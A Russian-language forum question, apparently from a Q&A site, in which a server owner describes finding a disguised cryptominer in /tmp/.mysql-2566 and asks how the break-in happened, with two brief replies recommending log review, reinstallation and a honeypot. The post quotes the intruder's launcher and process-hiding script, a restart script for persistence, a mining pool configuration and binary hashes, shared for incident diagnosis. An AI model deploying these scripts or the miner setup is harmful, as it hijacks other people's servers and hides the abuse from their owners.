Кто и как взломал мой сервер?

469
Sasha

На моем сервере я увидел, что «syslogd» потребляет довольно много ресурсов ЦП и работает как локальный пользователь «copy: copy» (действительный пользователь в моей системе). Короткое расследование показало, что этот "syslogd" был запущен отсюда:

ls /tmp/.mysql-2566 -rw-rw-r-- 1 copy copy 5 Nov 26 00:53 bash.pid -rwxrwxr-x 1 copy copy 838583 Feb 20 2016 f -rwxr-xr-x 1 copy copy 1049 Sep 24 08:45 httpd -rwxr-xr-x 1 copy copy 276 Sep 24 08:46 r -rwxr-xr-x 1 copy copy 1687632 Sep 24 07:52 syslogd -rwxrw-r-- 1 copy copy 182 Oct 13 02:53 upd

Процесс перезапускался сам по себе, единственный способ предотвратить это - переименовать каталог.

Конечно, все это не имеет ничего общего с syslogd / httpd / mysql. Файлы "f" и "syslogd" являются двоичными. И я показываю ниже содержание других файлов для полноты:

[root]# cat r #!/bin/bash ARCH=`uname -m` HIDE="/var/www/httpd2" hostname=`hostname` if [ "$ARCH" == "i686" ]; then ./e -s $HIDE ./systemd -c httpd >>/dev/null & elif [ "$ARCH" == "x86_64" ]; then ./f -s $HIDE ./syslogd -c httpd >>/dev/null &  fi echo $! > bash.pid

Следующий файл:

[root]# cat upd #!/bin/sh if test -r /tmp/.mysql-2566/bash.pid; then pid=$(cat /tmp/.mysql-2566/bash.pid) if $(kill -CHLD $pid >/dev/null 2>&1) then exit 0 fi fi cd /tmp/.mysql-2566 ./r &>/dev/null

И файл "config":

[root]# cat httpd  { "algo": "cryptonight", "api": { "port": 0, "access-token": null, "worker-id": null, "ipv6": false, "restricted": true }, "av": 0, "background": false, "colors": true, "cpu-priority": null, "donate-level": 0, "log-file": null, "pools": [ { "url": "nopro.online:80", "user": "hash", "pass": "x", "keepalive": true, "nicehash": false, "variant": -1 }, { "url": "nopro.xyz:80", "user": "hash", "pass": "x", "keepalive": true, "nicehash": false, "variant": -1 }, {  "url": "146.0.253.66:80", "user": "hash", "pass": "x", "keepalive": true, "nicehash": false, "variant": -1 } ], "print-time": 60, "retries": 3, "retry-pause": 3, "safe": false, "syslog": false, "threads": null }

Подписи двоичных файлов:

[root]# sha1sum f syslogd  59f5b21ef8a570c02453b5edb0e750a42a1382f6 f f00e1f4c277bdb99319f4c7540e0c5637d5ef07d syslogd

Вход в систему пользователя root отключен, а у пользователя «sudo» надежный пароль.

  1. Как я могу узнать, как сервер был взломан?
  2. Кто (и откуда) устанавливает файлы в /tmp/.mysql-2566?
  3. Кто-нибудь еще сталкивался с такой проблемой?

Заранее большое спасибо!

-2
Это не будет простой ответ, вам нужно прочесать лог-файлы, чтобы понять, что случилось с вашим сервером. Отправной точкой будет любой процесс, который выполняется с идентификатором пользователя «copy», более того, если он имеет открытый внешний интерфейс (прослушивающий сокет). Если нет, вам нужно будет вернуться к этому идентификатору пользователя. В любом случае система кажется довольно скомпрометированной, она требует полной переустановки silmaril 5 лет назад 2
Кроме того, если вы хотите заниматься судебной экспертизой, не делайте этого в реальной системе. Настройка honeypot также может быть хорошей идеей, если вы не можете извлечь достаточно информации с скомпрометированного сервера. dirkt 5 лет назад 1

0 ответов на вопрос

Похожие вопросы